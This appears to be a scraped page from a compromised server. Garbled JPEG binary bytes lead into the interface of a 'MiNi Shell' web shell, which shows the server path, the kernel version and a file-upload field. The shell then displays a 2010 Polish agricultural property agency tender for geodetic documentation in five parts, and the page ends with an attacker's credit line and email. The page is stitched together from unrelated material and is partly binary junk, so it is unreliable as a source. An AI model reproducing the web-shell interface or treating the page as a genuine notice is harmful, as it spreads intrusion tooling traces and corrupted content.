JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100908/245157-N-2010.html

<p class="kh_header"><b>Opole: Sporządzenie dokumentacji geodezyjno-prawnej - 5 zadań częściowych. Postępowanie nr: ZP-016/II/72/2010/U</b><br>
<b>Numer ogłoszenia: 245157 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Opolu , ul. 1 Maja 6, 45-068 Opole, woj. opolskie, tel. 077 4000900, faks 077 4000951.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie dokumentacji geodezyjno-prawnej - 5 zadań częściowych. Postępowanie nr: ZP-016/II/72/2010/U.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 1: 
Sporządzenie wykazu zmian (synchronizacyjnego) dla działki nr 1  położonej w obrębie  Przyborów, gmina Borzęcin, powiat brzeski, woj. małopolskie. 
Zadanie częściowe nr 2: 
Ujawnienie w operacie ewidencji gruntów i budynków zmiany  sposobu użytkowania  części działki  nr 25/1 z km 64 położonej w obrębie Górna wieś, gmina Nysa, powiat nyski, woj. opolskie. 
Zadanie częściowe nr 3: 
Aktualizacja danych ewidencyjnych działki  nr 212/96 o powierzchni 1,0940 ha położonej w miejscowości Sierakowice, gmina Sośnicowice, powiat gliwicki, woj. śląskie. 
Zadanie częściowe nr 4: 
Aktualizacja danych ewidencyjnych  polegająca na określeniu powierzchni oraz wznowieniu granic działki nr 103/2 z km 2 obręb Obórki o powierzchni 69,0049ha, gmina Olszanka, powiat Brzeski, woj. opolskie. 
Zadanie częściowe nr 5: 
Dostosowanie zapisów w ewidencji gruntów dotyczących rodzaju użytków, zgodnie z aktualnym sposobem użytkowania, nieruchomości położonej w obrębie Tomice, gmina Tomice i Wadowice, gmina Wadowice , oznaczonych w ewidencji gruntów i budynków jako dz. nr 1012, 1013/6, 1015/4, 1068/8, 1077/4, 1077/2, 1078, 1079, 1140, 1204, 916/1, 916/16, 924/2, 924/3, 924/4  z obrębu Tomice i dz. nr 2931/3, 2931/5 z obrębu Wadowice - zmiana z użytku Wp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Dysponuje co najmniej jedną osobą posiadającą wymagane uprawnienia w zakresie II geodezji - dotyczy zadania częściowego nr 1 - 5. 
2)	Dysponuje co najmniej jedną osobą posiadającą  wymagane uprawnienia w zakresie klasyfikacji gruntów - dotyczy zadania częściowego nr 5.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>(zaleca się również załączenie kopii dokumentu potwierdzającego posiadanie uprawnień zawodowych w zakresie II geodezji) -dotyczy zadania częściowego nr 1 - 5.
(zaleca się również załączenie kopii dokumentu potwierdzającego posiadanie uprawnień klasyfikatora gruntów) -dotyczy zadania częściowego nr 5.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Zmiana zawartej umowy oraz warunki tej zmiany. 
1.	Zamawiający przewiduje możliwość wprowadzenia zmiany  postanowień  zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2.	Dopuszcza się zamianę umownego terminu, pod warunkiem, że wystąpią:
1)	czynniki zewnętrzne niezależne od Zamawiającego i Wykonawcy, które nie pozwolą na prawidłowe i terminowe wykonanie zamówienia, (np. zdarzenia losowe, czynniki atmosferyczne).
2)	wystąpiła konieczność przeprowadzenia rozgraniczenia, 
3)	nastąpiła zmiana miejscowego planu zagospodarowania przestrzennego bądź studium,
4)	przekazanie nieruchomości lub jej części (działki) na rzecz instytucji samorządowych lub innych.
5)	przedłużające się procedury administracyjne,
6)	zaistnieje potrzeba przeprowadzenia robót dodatkowych, wyłącznie na czas ich prowadzenia jeżeli nie jest możliwe ich przeprowadzenie jednoczenie z zadaniem podstawowym. 
7)	w przypadku przedłużającej się procedury w związku uzyskaniem decyzji dot. podziału nie jest możliwe wykonanie przedmiotu zamówienia w terminie.
3.	Dopuszcza się zamianę osób odpowiedzialnych za wykonanie Zamówienia, pod warunkiem, że wystąpią następujące przypadki:
1)	śmierć, choroba lub inne zdarzenie losowe, 
2)	nie wywiązywania się osób z obowiązków wynikających z umowy, 
3)	rezygnacja tych osób z wykonywania  swoich obowiązków
4.	Dopuszcza się zamianę pozostałych zapisów umowy, pod warunkiem, że:
1)	wystąpi konieczności wyłączenia działek z umowy, których podział z przyczyn nie dających się przewidzieć nie jest możliwy do wykonania w zakresie zawartym w SIWZ.
2)	z powodu działania osób trzecich, wykonanie prac będzie niemożliwe, a działania te nie są konsekwencją winy którejkolwiek ze stron, 
3)	realizacja części przedmiotu zamówienia z przyczyn o obiektywnym charakterze nie jest możliwa do wykonania, 
4)	zmiana treści umowy jest korzystna dla zamawiającego,
5.	Przewiduje się możliwość rezygnacji z części  umownych prac w sytuacji gdy zmiany te będą  korzystne dla zamawiającego. 
6.	O wystąpieniu okoliczności, które mogą mieć wpływ na zmiany wprowadzane w umowie Wykonawca zobowiązany jest niezwłocznie poinformować pisemnie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych
Oddział Terenowy w Opolu
ul. 1 Maja 6
45-068 Opole
pokój nr 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 09:45, miejsce: Agencja Nieruchomości Rolnych
Oddział Terenowy w Opolu
ul. 1 Maja 6
45-068 Opole
pokój nr 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie częściowe nr 1: 
Sporządzenie wykazu zmian (synchronizacyjnego) dla działki nr 1  położonej w obrębie  Przyborów, gmina Borzęcin, powiat brzeski, woj. małopolskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 1: 
Sporządzenie wykazu zmian (synchronizacyjnego) dla działki nr 1  położonej w obrębie  Przyborów, gmina Borzęcin, powiat brzeski, woj. małopolskie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie częściowe nr 2: 
Ujawnienie w operacie ewidencji gruntów i budynków zmiany  sposobu użytkowania  części działki  nr 25/1 z km 64 położonej w obrębie Górna wieś, gmina Nysa, powiat nyski, woj. opolskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 2: 
Ujawnienie w operacie ewidencji gruntów i budynków zmiany  sposobu użytkowania  części działki  nr 25/1 z km 64 położonej w obrębie Górna wieś, gmina Nysa, powiat nyski, woj. opolskie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie częściowe nr 3: 
Aktualizacja danych ewidencyjnych działki  nr 212/96 o powierzchni 1,0940 ha położonej w miejscowości Sierakowice, gmina Sośnicowice, powiat gliwicki, woj. śląskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 3: 
Aktualizacja danych ewidencyjnych działki  nr 212/96 o powierzchni 1,0940 ha położonej w miejscowości Sierakowice, gmina Sośnicowice, powiat gliwicki, woj. śląskie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie częściowe nr 4: 
Aktualizacja danych ewidencyjnych  polegająca na określeniu powierzchni oraz wznowieniu granic działki nr 103/2 z km 2 obręb Obórki o powierzchni 69,0049ha, gmina Olszanka, powiat Brzeski, woj. opolskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 4: 
Aktualizacja danych ewidencyjnych  polegająca na określeniu powierzchni oraz wznowieniu granic działki nr 103/2 z km 2 obręb Obórki o powierzchni 69,0049ha, gmina Olszanka, powiat Brzeski, woj. opolskie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie częściowe nr 5: 
Dostosowanie zapisów w ewidencji gruntów dotyczących rodzaju użytków, zgodnie z aktualnym sposobem użytkowania, nieruchomości położonej w obrębie Tomice, gmina Tomice i Wadowice, gmina Wadowice , oznaczonych w ewidencji gruntów i budynków jako dz. nr 1012, 1013/6, 1015/4, 1068/8, 1077/4, 1077/2, 1078, 1079, 1140, 1204, 916/1, 916/16, 924/2, 924/3, 924/4  z obrębu Tomice i dz. nr 2931/3, 2931/5 z obrębu Wadowice - zmiana z użytku Wp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 5: 
Dostosowanie zapisów w ewidencji gruntów dotyczących rodzaju użytków, zgodnie z aktualnym sposobem użytkowania, nieruchomości położonej w obrębie Tomice, gmina Tomice i Wadowice, gmina Wadowice , oznaczonych w ewidencji gruntów i budynków jako dz. nr 1012, 1013/6, 1015/4, 1068/8, 1077/4, 1077/2, 1078, 1079, 1140, 1204, 916/1, 916/16, 924/2, 924/3, 924/4  z obrębu Tomice i dz. nr 2931/3, 2931/5 z obrębu Wadowice - zmiana z użytku Wp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com